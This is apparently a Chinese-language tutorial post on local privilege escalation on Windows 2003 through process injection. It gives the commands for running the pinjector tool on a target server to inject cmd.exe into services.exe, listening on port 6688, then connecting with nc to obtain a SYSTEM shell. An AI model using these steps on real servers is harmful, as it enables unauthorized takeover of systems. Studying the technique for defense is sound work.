windows权限提升——windows2003进程注入提升(本地)-CFANZ编程社区

windows权限提升——windows2003进程注入提升(本地)

一、进程注入简介

进程注入提权是本地提权方式的一种较为老的安全技术了，利用的是注入进程的所有者实现权限共享机制，这类技术主要利用在Windows2008之前操作系统上。所以我们需要学习后续的本地提权更多的手法才能针对高版本的系统。

版本： Windows2008之前

1.1 提权教程

演示环境：windows2003

1、将pinjector工具上传到目标服务器，运行以下命令

pinjector.exe 　　　　　　//运行命令，查看用法
pinjector.exe -l    //列出可注入的进程
pinjector.exe -p pid cmd.exe 6688　　　　//注入到系统正常的服务里，监听6688端口（一定要注入services.exe，查看后面是否为system运行）

windows权限提升——windows2003进程注入提升(本地)_web安全

windows权限提升——windows2003进程注入提升(本地)_windows_02

最后使用nc监听本地，进行提权

nc 127.0.0.1 6688

windows权限提升——windows2003进程注入提升(本地)_安全_03

0 条评论